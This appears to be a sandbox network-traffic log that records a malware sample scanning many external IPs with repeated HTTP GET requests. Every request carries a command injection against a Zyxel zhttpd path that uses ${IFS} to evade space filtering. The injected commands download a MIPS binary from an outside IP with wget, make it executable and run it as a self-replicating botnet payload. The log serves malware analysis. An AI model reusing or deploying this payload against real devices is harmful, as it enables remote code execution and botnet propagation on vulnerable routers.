                                        Jan 14, 2024 16:19:01.861335039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9107192.168.2.1333402213.249.238.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861392975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9108192.168.2.133874434.51.41.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861426115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9109192.168.2.1333414134.233.65.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861493111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9110192.168.2.1338614111.242.113.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861548901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9111192.168.2.1345768181.9.134.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861604929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9112192.168.2.1335702132.197.132.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861671925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9113192.168.2.1353102164.70.30.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861741066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9114192.168.2.1358952110.245.136.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861795902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9115192.168.2.1336740121.113.72.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861861944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9116192.168.2.1346496101.224.78.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861896038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9117192.168.2.133629098.161.107.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861954927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9118192.168.2.1360962159.70.186.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862029076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9119192.168.2.1349584140.194.160.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862067938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9120192.168.2.134043459.232.228.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862112045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9121192.168.2.134182032.129.40.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862179995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9122192.168.2.1358876171.222.39.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862256050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9123192.168.2.1340030122.230.85.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862320900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9124192.168.2.1344060170.213.107.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862365961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9125192.168.2.1340846206.49.152.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862436056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9126192.168.2.1348978113.60.188.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862488985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9127192.168.2.134881041.156.149.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862556934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9128192.168.2.1338110174.202.252.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862631083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9129192.168.2.135821879.245.59.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862673044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9130192.168.2.13509064.15.231.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862746000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9131192.168.2.1349854117.170.36.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862792969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9132192.168.2.1346280203.49.106.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862829924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9133192.168.2.135487070.163.168.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862900972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9134192.168.2.1360150136.253.0.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.862973928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9135192.168.2.1360034180.5.16.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863010883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9136192.168.2.1354690119.173.217.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863060951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9137192.168.2.134374697.162.1.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863115072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9138192.168.2.134806468.196.188.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863162041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9139192.168.2.1359330115.98.133.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863231897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9140192.168.2.1333524131.86.29.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863281012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9141192.168.2.1355778105.34.187.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863365889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9142192.168.2.134690462.133.50.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863431931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9143192.168.2.134991889.69.174.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863496065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9144192.168.2.134272873.245.240.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863557100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9145192.168.2.1338190179.35.1.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863640070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9146192.168.2.134171296.35.7.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863711119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9147192.168.2.135870427.180.100.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863770962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9148192.168.2.1344682204.246.59.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863826990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9149192.168.2.1359842152.42.125.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863888979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9150192.168.2.134560482.180.201.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.863955021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9151192.168.2.1353298216.112.206.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864016056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9152192.168.2.134131466.95.110.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864048004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9153192.168.2.134913691.171.57.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864104986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9154192.168.2.1358292110.209.183.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864166975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9155192.168.2.1352498121.82.168.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864206076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9156192.168.2.1354062133.186.58.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864269972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9157192.168.2.1353468188.77.170.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864339113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9158192.168.2.1348596168.107.8.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864372015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9159192.168.2.134160499.161.121.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864456892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9160192.168.2.134988838.151.145.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864521027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9161192.168.2.133594274.147.179.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864579916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9162192.168.2.134074494.243.222.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864646912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9163192.168.2.135751866.101.162.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864702940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9164192.168.2.135349278.24.18.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864762068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9165192.168.2.1352122169.115.48.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864816904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9166192.168.2.133477018.137.240.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864897966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9167192.168.2.1349130121.33.204.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864944935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9168192.168.2.1342114198.170.154.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.864993095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9169192.168.2.135024054.132.124.202443
                                        TimestampBytes transferredDirectionData
